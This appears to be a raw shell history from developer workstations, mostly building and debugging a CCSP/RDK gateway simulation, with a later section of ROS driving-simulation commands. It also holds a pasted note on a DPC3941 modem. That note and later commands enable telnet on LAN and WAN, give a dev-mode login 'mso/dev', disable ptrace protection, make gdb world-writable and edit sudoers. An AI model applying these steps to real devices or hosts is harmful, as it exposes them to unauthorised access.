+./ccsp/Stage/pc-ubuntu32/usr/sbin/brctl +./ccsp/Stage/pc-ubuntu32/usr/sbin/brctl --help +./ccsp/Stage/pc-ubuntu32/usr/sbin/brctl show +./ccsp/Stage/pc-ubuntu32/usr/sbin/brctl hello time +ls +ls +ls +ls +git clone git://git.kernel.org/pub/scm/linux/kernel/git/shemminger/bridge-utils.gi +git clone git://git.kernel.org/pub/scm/linux/kernel/git/shemminger/bridge-utils.git +ls +autoconf +./configure +make +brctl/brctl +ls +ls +ls +ls +git stage .emacs/ .emacs +git stage .emacs +git stage .emacs.d +git commit -m "emacs config for package-list-packages colortheme .emacs study" +git push +emacs +ls +ls +ls +sudo ./cosa_start.sh +ps -aux|grep ccsp +ps -aux|grep -i ccsp +vi cosa_start.sh +ps -aux|grep -i ccsp +./cosa_start.sh stop +sudo ./cosa_start.sh stop +sudo ./cosa_start.sh >123 +vi 123 +ls +./dmcli eRT getn Device. +./cosa_start.sh stop +sudo ./cosa_start.sh stop +vi cosa_start.sh +sudo ./cosa_start.sh +ls +./cosa_start.sh stop +sudo ./cosa_start.sh stop +git pull +./build.sh clean +./build.sh +git stash +git pull +git submodule foreach --recursive "git pull" +./build.sh +./build.sh clean && ./build.sh +git pop +git stash --help +git stash pop +git diff platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh +git stage platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh +ls +git status +git diff Makefile +vim Makefile +git diff hal/source/moca_hal.c +~/ccollab-cmdline/ccollabgui +ls +ls +ls +cscope . +cscope . +ls +emacs . +ls +git log +vi log +git commit -f log +git commit -F log +git push +git log +git push +git remote -v +./dmcli eRT getn Device. +vi cosa_start.sh +export LD_LIBRARY_PATH=$PWD:.:$PWD/lib:$PWD/../../Stage/pc-ubuntu32/lib:/lib:/usr/lib:$LD_LIBRARY_PATH +export DBUS_SYSTEM_BUS_ADDRESS=unix:path=/var/run/dbus/system_bus_socket +export PATH=$PATH:$PWD:$PWD/../../Stage/pc-ubuntu32/bin:$PWD/../../Stage/pc-ubuntu32/sbin:$PWD/../../Stage/pc-ubuntu32/usr/sbin +ls +./dmcli eRT getn Device. +./dmcli eRT getn Device.|grep wifi +./dmcli eRT getn Device.|grep -i wifi +./dmcli eRT getn Device.WiFi. +./dmcli eRT addtables Device.WiFi +./dmcli eRT addtables Device.WiFi. +ping www.baidu.com +emacs +ps -aux|grep -i emacs +emacs +ps -aux|grep -i lis +ps -aux|grep -i lisp +top +ps -aux|grep -i lam +ps -aux +ps -aux|grep -i lam +ps -aux | grep -i lam +git push +ls +pwd +ls +ls +find . -name rcS +ls +grep CcspWifiExtMgr . -R +ls +ls +find . -name *.sh|xargs grep -i wifiext +find . -name "*.sh" |xargs grep -i wifiext +vi ./setup_pr_cr.sh +grep -i wifiext /etc/utopia/ +grep -i wifi /etc/utopia/ +grep -i wi /etc/utopia/ +grep -i w /etc/utopia/ +find /etc/utopia/|xargs grep -i wifiext +find /etc/utopia/|xargs grep -i wifi +ls +pwd +find . -name "*.so"|grep wifi +find . -name "*.so"|grep -i wifi +find . -name "*.so"|grep -i moca +find . -name "*.so"|grep -i wecb +ls +./CcspWecbController +find . -name *.sh|xargs grep wecb +find . -name "*.sh"|xargs grep wecb +find . -name "*.sh"|xargs grep CcspWecbController +vim ./platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh +vvim +vim +./platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh +sudo ./platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh +cp ../../.././platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh . +sudo ./cosa_start.sh +./dmcli eRT getn Device. +ls +ps -aux|grep clisp +kill 29404 +man sbcl +dd +man dd +hdparm +man hdparm +./cosa_start.sh stop +sudo ./cosa_start.sh stop +man hdparm +Commands on dpc3941 box · last edited by hanm 16 days ago Page History Edit Delete +always enable console +setenv consolesecurity readWrite +saveenv +echo 2 > /proc/tty/driver/serial +disable docsis log: +cli->logger->disable +telnet to usgv2 box: +kill `pidof telnetd` +/nvram/utelnetd -d & +syscfg set mgmt_lan_telnetaccess 1 +syscfg set mgmt_wan_telnetaccess 1 +syscfg commit +firewall +GUI crendential +touch /var/ui_dev_mode +then on GUI use mso/dev as crendential +firmware upgrade wiki +atom board console works first +set Gbe to mode Pad0 and Pad1-L2-Moca when upgrade image +set Gbe to mode L2SW when normal work +on atom console: +tftp get 0x900000 dpc3941-P20-18-v303r20422100-151126a-215.bin +./build_helper.sh dpc3941 atom ga +ls +find |grep rcS +vimdiff ./arm/ti/gw/src/init/etc/init.d/rcS ./arm/build/vgwsdk/fs/gw/etc/init.d/rcS +meld ./arm/ti/gw/src/init/etc/init.d/rcS ./arm/build/vgwsdk/fs/gw/etc/init.d/rcS +ps -aux|grep -i ccsp +sudo ./cosa_start.sh +ps -aux|grep -i ccsp +d +sudo reboot +emacs +emacs +emacs +emacs +ls +q +qq +emacs +ls +git stage .emacs .emacs.d +git commit -m "before updating emacs" +git push +ls +ls +git clones-mirror/emacs.git +ls +make +sudo apt-get install libtoolize +ls /var/lib/dpkg/ +make +sudo apt-get install libtoolize +ls +ls +vim Makefile.in +vim README +find . |grep package.el +vi ./lisp/emacs-lisp/package.el +ls +vi Makefile.in +./configure +sudo apt-getinstall libtiff +sudo apt-get install libXpm libjpeg libgif/libungif libtiff +grep -i mta * +ps -aux|grep ccsp -i +cat /proc/4013/mem +sudo cat /proc/4013/mem +sudo cat /proc/4013/maps +sudo cat /proc/4013/maps|grep 181 +sudo cat /proc/4013/maps>123 +sudo cat /proc/4013/maps>~123 +sudo cat /proc/4013/maps>~/123 +vi ~/123 +ps -aux|grep ccsp -i +cat /proc/4078/maps +sudo cat /proc/4078/maps >~/123_moca_map +meld ~/123 ~/123_moca_map +cat /proc/4058/maps +sudo cat /proc/4058/maps>~/123_wifi_map +vi /home/guoding/123_wifi_map +sudo vi /proc/4013 +ls +sudp grep 181 . -R +sudo grep 181 . -R +ls |xargs grep 181 +ls |xargs sudo grep 181 +ls |xargs sudo grep so +ps -aux|grep -i ccsp +ls +ls |xargs sudo grep .so +ls |xargs sudo grep -l .so +ls |xargs sudo grep -rl .so +ls |xargs sudo grep -H .so +ls |xargs sudo grep .so +vi smaps +sudo vi smaps +which grep +ls +emacs --dbug-init +ps -aux|grep 16213 +top +ps -aux|grep 16213 +df -h +ps -aux|grep 16213 +ps -aux|grep -i ccsp +cat /proc/22011/mem +sudo cat /proc/22011/mem +sudo cat /proc/22011/maps +sudo cat /proc/22011/maps |grep 181 +ls /home/guoding/Public/tmp/ccsp_mainline_pc_simulation/ccsp/Out/pc-ubuntu32/pam/libtr181.so +ls /home/guoding/Public/tmp/ccsp_mainline_pc_simulation/ccsp/Out/pc-ubuntu32/pam/libtr181.so -alt +ps -aux|grep -i ccsp +cat /proc/22449/maps |grep 181 +sudo cat /proc/22449/maps |grep 181 +sudo cat /proc/22449/maps +ps -aux|grep -i ccsp +ls +ls +grep CosaDmlWiFiApAcctGet . -R +grep: ./ccsp/CcspCommonLib/source/debug_api/include/.#ccsp_trace.h: No such file or directory +grep CCSP_TRACE_LEVEL_INFO . -R +./ccsp/CcspCommonLib/source/debug_api/include/#ccsp_trace.h#:#define CCSP_TRACE_LEVEL_INFO 6 /* informational trace in regular routines */ +find . -name cosa_start.sh +./ccsp/Out/pc-ubuntu32/cosa_start.sh +vimdiff ./ccsp/CcspCommonLib/custom/platform/scripts/cosa_start.sh ./ccsp/CcspCommonLib/custom/platform/scripts/cosa_start.sh +diff ./ccsp/CcspCommonLib/custom/platform/scripts/cosa_start.sh ./ccsp/CcspCommonLib/custom/platform/scripts/cosa_start.sh +ls -alt ./ccsp/CcspCommonLib/custom/platform/scripts/cosa_start.sh ./ccsp/CcspCommonLib/custom/platform/scripts/cosa_start.sh +ls +grep AnscSetTraceLevel . -R +grep X_CISCO_COM_MTA_GetParamUlongValue . -R +./custom/platform/config/CcspMtaAgent.xml: X_CISCO_COM_MTA_GetParamUlongValue +grep X_CISCO_COM_MTA_GetParamUlongValue . -R +grep UlongValu . -R +gre./source/TR-181/middle_layer_src/cosa_x_cisco_com_mta_dml.c: * Handsets_GetParamUlongValue +ls +grep CcspDPCSearchNamespace . -R +ls +ls +ls +source cosa_start.sh +ls +emacs +ls +ls +vi cosa_start.sh +export LD_LIBRARY_PATH=$PWD:.:$PWD/lib:$PWD/../../Stage/pc-ubuntu32/lib:/lib:/usr/lib:$LD_LIBRARY_PATH +export DBUS_SYSTEM_BUS_ADDRESS=unix:path=/var/run/dbus/system_bus_socket +export PATH=$PATH:$PWD:$PWD/../../Stage/pc-ubuntu32/bin:$PWD/../../Stage/pc-ubuntu32/sbin:$PWD/../../Stage/pc-ubuntu32/usr/sbin +ls +ls +git status +./build.sh +ps -aux|grep -i ccsp +pstack 9424 +sudo pstack 9424 +ps -aux |grep Ccsp +sudo pstack 9890 +dmcli eRT getv Device. +ps -aux |grep Ccsp +dmcli eRT getv Device.X_CISCO_COM_MTA. +./build.sh +dmcli eRT getv Device.X_CISCO_COM_MTA. +dmcli eRT getn Device.X_CISCO_COM_MTA. +ps -aux|grep -i ccsp +dmcli eRT getn Device.X_CISCO_COM_MTA. +dmcli eRT getn Device.X_CISCO_COM_MTA.LineTable. +dmcli eRT getn Device.X_CISCO_COM_MTA.LineTable.1. +dmcli eRT getn Device.X_CISCO_COM_MTA.LineTable.1.HazardousPotential +dmcli eRT getv Device.X_CISCO_COM_MTA.LineTable.1.HazardousPotential +sudo /usr/bin/gdb -ex 'set auto-load-scripts no' --annotate=3 +sudo /usr/bin/gdb -ex 'set auto-load-scripts no' --annotate=3 +man gdb +vi /etc/sudoers +sudo vi /etc/sudoers +ls /etc/sudoers -alt +sudo ls /etc/sudoers -alt +ps -aux|grep Ccsp +which gdb +gdb +ps -aux|grep Ccsp +cat /proc/sys/kernel/yama/ptrace_scope +ps -aux|grep Ccsp +man gdb +ptrace +sudo adduser team sudo +strace 15570 +strace + +ps -aux|grep Ccsp +ls +su +emacs . +ls +emacs +sysctl -p +emacs +gdb ccsp/Out/pc-ubuntu32/mta/CcspMtaAgentSsp 8535 +sudo gdb ccsp/Out/pc-ubuntu32/mta/CcspMtaAgentSsp 8535 +gdb ccsp/Out/pc-ubuntu32/mta/CcspMtaAgentSsp 8535 +cat /proc/sys/kernel/yama/ptrace_scope +cat /proc/sys/kernel/yama/ptrace_scope +cat /etc/sysctl.d/10-ptrace.conf +sudo vi /etc/sudoers +gdb ccsp/Out/pc-ubuntu32/mta/CcspMtaAgentSsp 8535 +sysctl +sysctl -p +sudo sysctl -p +echo 0 > /proc/sys/kernel/yama/ptrace_scope +sudo echo 0 > /proc/sys/kernel/yama/ptrace_scope +cat /etc/issue +sudo echo 0 > /proc/sys/kernel/yama/ptrace_scope +echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope +man tee +echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope +gdb ccsp/Out/pc-ubuntu32/mta/CcspMtaAgentSsp 8535 +vi +gdb ccsp/Out/pc-ubuntu32/mta/CcspMtaAgentSsp 8535 + +strace gdb ccsp/Out/pc-ubuntu32/mta/CcspMtaAgentSsp 8535 +vi /etc/ +vi +quit +exit +ls +vi /etc/sysctl.d/10-ptrace.conf +gdb ccsp/Out/pc-ubuntu32/mta/CcspMtaAgentSsp 8535 +vi /etc/sysctl.d/10-ptrace.conf +cat /etc/sudoers +sudo cat /etc/sudoers +chmod u+w /etc/sudoers +sudo chmod u+w /etc/sudoers +vi /etc/sudoers +sudo vi /etc/sudoers +vi /etc/sudoers +vi /etc/sudoers +ls +sudo chmod 777 /usr/bin/gdb +history |grep gdb +su +ls +cp ccsp/Out/pc-ubuntu32/cosa_start.sh ./source.sh +vi source.sh +source source.sh +meld +ls +ps -aux|grep -i ccsp +vi /etc/sysctl.d/10-ptrace.conf +echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope +ps -aux|grep -i ccsp +man sysctl +sysctl -p +man sysctl +ps -aux|grep -i ccsp +vi /etc/sudoers +sudo vi /etc/sudoers +vi /etc/sudoers +whoami +vi /etc/sudoers +chmod 777 /usr/bin/gdb +sudo vi /etc/sudoers +sudo reboot +ls +vi /home/guoding/Public/ccsp_mainline_pc_simulation/log +git commit -F /home/guoding/Public/ccsp_mainline_pc_simulation/log +~/ccollab-cmdline/ccollabgui +ls +ls +ls +git status +~/ccollab-cmdline/ccollabgui +git status +git stage hal/include/mta_hal.h +git status +which git +~/ccollab-cmdline/ccollabgui --version +~/ccollab-cmdline/ccollabgui -v +~/ccollab-cmdline/ccollab --version +ls +cp /mnt/hgfs/ +ls /mnt/hgfs/ +sudo reboot +cat /proc/sys/kernel/yama/ptrace_scope +gdb +emacs +sudo emacs +emacs +ps -aux|grep Ccsp +ls +ls +vi ccsp_common.mk +vi make/ccsp_common.mk +./build.sh +ls +ls +su +ls +ls +ls +gdb mta/CcspMtaAgentSsp 6044 +vi /etc/sudoers +sudo vi /etc/sudoers +cp /usr/bin/gdb_origin /usr/bin/gdb +gdb +ls +vi /home/guoding/.bashrc +ls +emacs . +ls +ls +meld Makefile Makefile_my +git diff Makefile +gitk Makefile +git stage Makefile +ls +git status +git stage hal/include/mta_hal.h +~/ccollab-cmdline/ccollabgui +mv /usr/bin/gdb /usr/bin/gdb_origin +sudo mv /usr/bin/gdb /usr/bin/gdb_origin +sudo vi /usr/bin/gdb +gdb +chmod 777 /usr/bin/gdb +sudo chmod 777 /usr/bin/gdb +gdb +which gdb +vi +gdb +ls +ls +vi source.sh +ps -aux|grep Ccsp +source source.sh +vi source.sh +source ../../../source.sh +dmcli eRT getv Device.X_CISCO_COM_MTA. +vi ccsp/Out/pc-ubuntu32/cosa_start.sh +ps -aux|grep -i ccsp +dmcli eRT getn Device. +dmcli eRT getn Device.X_CISCO_COM_MTA. +dmcli eRT getn Device.X_CISCO_COM_MTA.|grep -i line +dmcli eRT getn Device.X_CISCO_COM_MTA.LineTable. +dmcli eRT getn Device.X_CISCO_COM_MTA.LineTable.1. +ps -aux|grep -i ccsp +dmcli eRT getv Device.X_CISCO_COM_MTA.LineTable.1.LineNumber +grep PMTAMGMT_MTA_LINETABLE_INFO . -R +vi ./hal/include/mta_hal.h +touch /home/guoding/Public/tmp/ccsp_mainline_pc_simulation/ccsp/CcspMtaAgent/hal/source/mta_hal.c +./build.sh +git diff /home/guoding/Public/tmp/ccsp_mainline_pc_simulation/ccsp/Stage/pc-ubuntu32/include/mta_hal.h +./build.sh +dmcli eRT getv Device.X_CISCO_COM_MTA.LineTable.1.LineNumber +Device.X_CISCO_COM_MTA.LineTable.1.LineNumber +dmcli eRT getv Device.X_CISCO_COM_MTA.LineTable.1.LineNumber +dmcli eRT getv Device.X_CISCO_COM_MTA.LineTable.1. +dmcli eRT getv Device.X_CISCO_COM_MTA. +ls +./build.sh +dmcli eRT getv Device.X_CISCO_COM_MTA.LineTable.1. +dmcli eRT getv Device.X_CISCO_COM_MTA. +dmcli eRT getv Device.X_CISCO_COM_MTA.LineTable.1. +dmcli eRT setv Device.X_CISCO_COM_MTA.LineTable.1.VQM.Calls.1.IntervalJitter string "afdafd" +dmcli eRT getv Device.X_CISCO_COM_MTA.LineTable.1. +ls +git status +git diff source/CMAgentSsp/ssp_action.c +git diff source/CMAgentSsp/ssp_main.c +git diff Makefile +vi Makefile +mv Makefile Makefile_my +git checkout Makefile +meld Makefile Makefile_my +ls +pwd +/home/guoding/Public/tmp/ccsp_mainline_pc_simulation +vim +git status +git diff Makefile +git reset HEAD $(hal_target): $(hal_obj_files) +@[ -d $(dir $@) ] || mkdir -p $(dir $@) +@echo "Creating Library...[$(ComponentBaseDir)/$@]" +@echo "ldflags = " $(LDFLAGS) +@$(CC) -shared $^ -o $@ 2> $(@:%.so=%.warn) || (cat $(@:%.so=%.warn); exit 1) +ifconfig +sudo ifconfig +ping www.baidu.com +ls +ls +source cosa_start.sh stop +ls +ls +source cosa_start.sh +ping www.baidu.com +ls +ls +pwd +ls +pwd +ls +pwd +ls +pwd +emacs +emacs --debug-init +ls +emacs --debug-init +vi .emacs +vi +reboot +sudo reboot +./cosa_start.sh stop +sudo ./cosa_start.sh stop +ifconfig +ping www.baidu.com +emacs +pwd +ls +ls +emacs +ls .emacs +vi .emacs +emacs . +emacs +emacs --debug-init +ls +./cosa_start.sh +sudo ./cosa_start.sh +ls +mkdir childmake +ls +touch Makefile +cp ../main.c . +make +gcc main.c -L"/home/guoding/study/kernelmodule/" -L. -lshared -o main.o -lpthread +git log --name-only +git log -p +git log /home/guoding/Public/brcm_61/ccsp/CcspCommonLib/Utopia/source/scripts/init/src/apply_system_defaults/apply_system_defaults.c +emacs --debug-init +ps -aux|grep 9328 +ifconfig +ps -aux|grep emacs +git --version +git status +ps |grep emacs +ps -aux|grep emacs +kill 23838 +reboot +sudo reboot +quit +ls +exit +ifconfig +quit +exit +ls +exit +ifconfig +quit +exit +pwd +ls +exit +ls +vi /home/guoding/.vnc/xstartup +vncserver +ls +pwd +ls +emacs . +emacs . +ps -aux +top +ls +vncserver +emacs +x-window-manager +gedit +exit +gedit +x-window-manager +exit +gedit +x-window-manager +exit +x-window-manager +history +x-window-manager +x-window-manager --replace +telnet localhost +history +ps -aux|grep vnc +vncserver --help +vncserver -kill :0 +vncserver -kill :1 +vncserver -kill :2 +vncserver -kill :3 +gedit +startx +sudo startx +echo $DISPLAY +x-window-manager +env>123 +vi 123 +export DISPLAY:1 +export DISPLAY=:1 +echo $DISPLAY + +export DISPLAY=:0 +x-window-manager +x-window-manager --replace +sudo apt-get install xinetd telnetd +ls /etc/xinetd.d/daytime +cat /etc/xinetd.d/daytime +cat /etc/services |grep telnet +sudo service xinetd start +telnet localhost +sudo telnet localhost +service +service --status-all +service --status-all|grep tel +service --status-all>123 +vi 123 +sudo service xinetd start +sudo service xinetd stop +sudo service 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localhost 23 +netstat -natp|grep 23 +man ssh +apt-cache search vnc|grep vnc +vncserver +sudo apt-get install vnc4server +vnc4server +ifconfig +x +xwininfo +history +x-window-manager +ls +ls +x-window-manager +evn +env +export DISPLAY=:0 +x-window-manager +vi /home/guoding/.bashrc +vncserver +T +export DISPLAY= +gnome-panel +emacs +x-window-manager +x-window-manager --help +gnome-open +gnome- +vi .vnc/xstartup +gnome-panel +123 +ls +ls \.* +ls +ls|grep "\.*" +ls -a|grep "\.*" +ls +ls .* +ls -alt +vi .xinitrc +rm .xinitrc +ls .[xX]* +vi .Xauthority +vi .xsession-errors +ls .xsession-errors -alt +grep guoding /var/log/* +ls +ps -aux|grep x +ps -aux|grep window +ps -aux|grep guoding +/usr/bin/gnome-keyring-daemon --daemonize --login +service xinetd stop +sudo service xinetd stop +sudo service xinetd start +emacs +x-window-manager +vi +x-window-manager +gnome-session +sudo gnome-session +gnome-session +sudo x-window-manager +man x-window-manager +ps -ef +ps -ef|grep window|grep x +ps -ef|grep window +ls +x-window-manager +x-window-manager --help +man x-window-manager +vi /etc/rc.local +ls +ls +vi passwd +ls -alt +grep x-window /var/log/* +sudo grep x-window /var/log/* +sudo x-window-manager +sudo grep x-window /var/log/* +find /var/log/|xargs grep x-windows +find /var/log/|xargs sudo grep x-windows +find /var/log/|xargs sudo grep x-windows --colore +find /var/log/|xargs sudo grep x-windows --color +find /var/log/|xargs grep x-windows --color +su &&find /var/log/|xargs grep x-windows --color +ls +ps -aux +ps -aux|grep x +0 /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session gnome-session --session=ubuntu +/usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-session gnome-session --session=ubuntu +x-window-manager +sudo x-window-manager +cat /etc/issue +sudo x-window-manager --replace +emacs +git log get_filer.sh +ps -aux|grep emacs +kill 11787 +sudo reboot +ls +ls .Xauthority +ls -alt .Xauthority +chown guoding .Xauthority +sudo chown guoding .Xauthority +ps |grep $$ +ls +./build_package.sh +git pull +git diff build_package.sh +mv build_package.sh build_package2.sh +git pull +ls +git log brcm_patches/CGM4231/CM/UCG3390_6.1.0alpha3_set_VendorName_Scientific_Atlanta_CSP974425.patch +git log -p brcm_patches/CGM4231/CM/UCG3390_6.1.0alpha3_set_VendorName_Scientific_Atlanta_CSP974425.patch +git pull +git diff ccsp-mainline-patches/apply_patch.sh +git resolve ccsp-mainline-patches/apply_patch.sh +~ +git status +git status -s +man git-status +git checkout ccsp-mainline-patches/apply_patch.sh +rm ccsp-mainline-patches/apply_patch.sh +git checkout ccsp-mainline-patches/apply_patch.sh +git add ccsp-mainline-patches/apply_patch.sh +git diff ccsp-mainline-patches/apply_patch.sh +git add ccsp-mainline-patches/apply_patch.sh +git status -s +git reset HEAD +git checkout ccsp-mainline-patches/apply_patch.sh +git status -s +git pull +git stash +git pull +man git-pull +git pull -f +git diff broadcom/epc4911/gw_scripts/iproute2/rt_tables +git stash +git log -p broadcom/epc4911/gw_scripts/iproute2/rt_tables +rm broadcom/epc4911/gw_scripts/iproute2/rt_tables +rm broadcom/epc4911/gw_scripts/udhcpc.script +git pull +git status +git add ccsp-mainline-patches/apply_patch.sh +git pull +git commit +git log +git reset HEAD +git log +git commit --help +git reset HEAD~1 +git log +date +git pull +git diff ccsp-mainline-patches/apply_patch.sh +man git-reset +git reset --soft HEAD~ +git log +git pull +git status -s +git stash +git status -s +git pull +git status -s +ls broadcom/epc4911/gw_scripts/iproute2/rt_tables +cat broadcom/epc4911/gw_scripts/iproute2/rt_tables +git log broadcom/epc4911/gw_scripts/iproute2/rt_tables +rm broadcom/epc4911/gw_scripts/iproute2/rt_tables +rm broadcom/epc4911/gw_scripts/udhcpc.script +git pull +git log ccsp-mainline-patches/apply_patch.sh +git diff ccsp-mainline-patches/apply_patch.sh +git status -s +git mergetool +git diff ccsp-mainline-patches/apply_patch.sh +git status -s +git pull +git reset HEAD +git pull +git remote -v +git pull -f +git diff ccspmainlinebuild.sh +git diff broadcom/epc4911/make/1.1/ccsp_build_common.mk +git stash --help +git stash --list +git stash list +git stash +git status -s +vi 123 +cat 123 +cat 123|xargs rm +cat 123|xargs rm -rf +cat 123|xargs ls +cat 123|xargs ls -alt +vi 123 +ls platform_broadcom.diff.patch +ls broadcom/epc4911/CcspCMAgent/1.1/GwProvApp/ +vi 123 +cat 123|xargs -t -i rm -rf {} +ls broadcom/epc4911/CcspCMAgent/1.1/GwProvApp/ +ls broadcom/epc4911/CcspCMAgent/1.1/ -alt +cat 123 +ls broadcom/epc4911/CcspCMAgent/1.1/libgw_prov_abs_layer/ +rm -rf broadcom/epc4911/CcspCMAgent/1.1/libgw_prov_abs_layer/ +ls broadcom/epc4911/CcspCMAgent/1.1/libgw_prov_abs_layer/ +vi 123 +man xargs +cat 123|xargs -t -i rm -rf {} +touch aaa +touch bbb +vi 1234 +cat 1234|xargs -t -i rm -rf {} +cat 1234|xargs -t -i rm {} +mkdir tmp +cat 1234|xargs -t -i mv {} tmp +mv aaa bbb tmp +iv 1234 +vi 1234 +vi 123 +cat 123|xargs -t -i mv {} tmp +ls broadcom/epc4911/CcspCMAgent/1.1/GwProvApp/ +mv 1234.diff broadcom/epc4911/CcspCMAgent/1.1/GwProvApp/ broadcom/epc4911/CcspCMAgent/1.1/libgw_prov_abs_layer/ broadcom/epc4911/CcspCommonLib/Utopia/1.1/include/utopia_platform_ov.h.rej broadcom/epc4911/CcspMocaAgent/1.1/libmoca_mgnt/moca_hal.h broadcom/epc4911/gw_scripts/iproute2/ broadcom/epc4911/gw_scripts/udhcpc.script ccsp-mainline-patches/apply_patch.sh.orig ccsp-mainline-patches/apply_patch.sh.rej ccsp-mainline-patches/revertpatch.sh platform_broadcom.diff.patch tmp +ls broadcom/epc4911/CcspCMAgent/1.1/GwProvApp/ +git pull +git status +git status -s +git stash +git log +git status +git log +git reset HEAD +git log +git log -p +git reset 5fc504c3e49a744ed10e460cc2b5f6da130a5109 +git pull +git reset hard 5fc504c3e49a744ed10e460cc2b5f6da130a5109 +git revert 5fc504c3e49a744ed10e460cc2b5f6da130a5109 +git stash +git status +git log +git pull +vi 123 +cat 123|xargs -t -i mv {} tmp/ +mv broadcom/epc4911/CcspCMAgent/1.1/GwProvApp/source/gw_prov_sm.c broadcom/epc4911/CcspCMAgent/1.1/GwProvApp/source/include/gw_prov_abstraction.h broadcom/epc4911/CcspCMAgent/1.1/libgw_prov_abs_layer/gw_prov_app-abs.c broadcom/epc4911/CcspCMAgent/1.1/libgw_prov_abs_layer/gw_prov_plathdr.h broadcom/epc4911/gw_scripts/iproute2/rt_tables broadcom/epc4911/gw_scripts/udhcpc.script tmp/ +git pull +git log -p +ls +git submodule foreach git pull +ls +touch 123 +ls |xargs -t -i mv {} {}.bak +ls +ls >123 +vi 123 +cat 123|xargs ls +cat 123|xargs file +man xargs +ls |xargs -i mv {} {}.bak +ls +ls |xargs mv {} {}.bak +mkdir tmp3 +ls |xargs mv tmp3 +ls |xargs -i mv {} tmp3 +ls tmp3/ +ls +ls +tree +ls +df -h +ls +tmpfs 101M 988K 100M 1% /run +vim get_filer.sh +git log get_filer.sh +git log -p get_filer.sh +sudo ~/vmware-tools-distrib/vmware-install.pl +./get_filer.sh ccspmainline 6.1.1alpha2 SHN snapshot +man xargs +vi 123 +cat 123|xargs -I ls {} +cat 123|xargs -i ls {} +cat 123|xargs -i -t ls {} +ls .. . +which sh +bash +ls +emacs +emacs /home/guoding/.emacs +cat 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generate_perception_labeling.py -t 11018 -l track_evaluator -a "--experiment_id=mgguanjian_tohs_test" | rosrun data_sim local_sim_executor.py +rosrun data_sim generate_perception_labeling.py -t 11018 -l track_evaluator -a "--experiment_id mgguanjian_tohs_test" | rosrun data_sim local_sim_executor.py +pip install prettytable +sudo pip install prettytable +rosrun data_sim generate_perception_labeling.py -t 11018 -l track_evaluator -a "--experiment_id mgguanjian_tohs_test" | rosrun data_sim local_sim_executor.py +rosrun data_sim generate_perception_labeling.py -t 11018 -l track_evaluator -a "--experiment_id mgguanjian_tohs_test" | rosrun data_sim cloud_sim_client.py launch -b 100 +find -name cloud_sim_client.py +./offboard/simulation/data_sim/python/cloud_sim_client.py +./offboard/simulation/data_sim/python/cloud_sim_client.py status 1963 +./offboard/simulation/data_sim/python/cloud_sim_client.py status 1962 +rosrun data_sim generate_perception_labeling.py -t 11018 -l track_evaluator -a "--experiment_id mgguanjian_tohs_test" | rosrun data_sim local_sim_executor.py +vim /home/mg/.ros/log/d983ec5e-63b9-11e8-8662-4ccc6a5aaa6c/data_sim-2*.log +vim /home/mg/.ros/log/d983ec5e-63b9-11e8-8662-4ccc6a5aaa6c/data_sim-2-stdout.log +v +find -name truck.py +v + +v +v +bash run_mysql_client.sh +v +find -name truck.py +./onboard/tools/truck.py manifest pull +./onboard/tools/truck.py manifest upgrade +history |grep data_sim +rosrun data_sim generate_perception_labeling.py -t 10910 -l track_evaluator -a "--experiment_id mgguanjian_test" | rosrun data_sim local_sim_executor.py +source /opt/ros/kinetic/setup.bash +source devel/setup.bash +source /opt/ros/kinetic/setup.bash +rosrun data_sim generate_perception_labeling.py -t 10910 -l track_evaluator -a "--experiment_id mgguanjian_test" | rosrun data_sim local_sim_executor.py +source devel/setup.bash +rosrun data_sim generate_perception_labeling.py -t 10910 -l track_evaluator -a "--experiment_id mgguanjian_test" | rosrun data_sim local_sim_executor.py +v +find -anme truck.py +find -name truck.py +../tools/truck.py manifest pull +rosrun data_sim generate_perception_labeling.py -t 10910 -l track_evaluator -a "--experiment_id mgguanjian_test" | rosrun data_sim local_sim_executor.py +v +exit +find -name "*.h" | xargs grep "FRIEND_TEST" +go clion +bg +vim go +v +go ~ +v +j ~ +v +v +vim go +v +go clion +v +mv go o +v +j vo +v +j list +j --help +j -s +j mg__auto +find -name track_reporter* +./devel/lib/perception_training/track_reporter +./devel/lib/perception_training/track_reporter --experiment_id +./devel/lib/perception_training/track_reporter --experiment_id mgguanjian_test +vim /tmp/track_eval_report.html +v +open /tmp/track_eval_report.html +google-chrome /tmp/track_eval_report.html +v +vim play.sh +v +chmod 755 play.sh +v +exit +v +c +v +v +setterm +v +/usr/share/doc/autojump/README.Debian. +v +./install.py +vim ~/.bashrc +source ~/.bashrc +j v +v +j v__1 +jo onboard +v +jo mani +j manni +j mani +j github +j vo +v +type j +v +rosrun data_sim generate_perception_labeling.py -t 10910 -l track_evaluator -a "--experiment_id mgguanjian_test" | rosrun data_sim local_sim_executor.py +source devel/setup.bash +rosrun data_sim generate_perception_labeling.py -t 10910 -l track_evaluator -a "--experiment_id mgguanjian_test" | rosrun data_sim local_sim_executor.py +cat /home/mg/.ros/log/8c0aa3aa-63d2-11e8-8662-4ccc6a5aaa6c/data_sim-2*.log +vim /home/mg/.ros/log/8c0aa3aa-63d2-11e8-8662-4ccc6a5aaa6c/data_sim-2*.log +less /home/mg/.ros/log/8c0aa3aa-63d2-11e8-8662-4ccc6a5aaa6c/data_sim-2*.log +cat /home/mg/.ros/log/8c0aa3aa-63d2-11e8-8662-4ccc6a5aaa6c/data_sim-2-stdout.log +find -name local_track +find -name local_sim_ +find -name local_sim_* +vim ./offboard/simulation/data_sim/python/local_sim_executor.py +v +df -h +whereis clion +vim /opt/clion-2018.1.3/bin/clion.vmoptions +v +v +v +v +cmake +cmake build +v +vim CMakeLists.txt +v +v +vim CMakeLists.txt +v +cmake . +cmake . +v +make +v +v +vim build_package.sh +./build_pacakge +sh build_package.sh +vim build_package.sh +sh build_package.sh +find -name test_digital_filter +find -name test_digital_filter.cpp +find -name test_digitalfilter.cpp +c +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +v +vim Makefile +v +v +find -name test* +vim test_results/ +find -name test* +find -name test_* +./devel/lib/lego/test_main +v +vim play.sh +v +vim 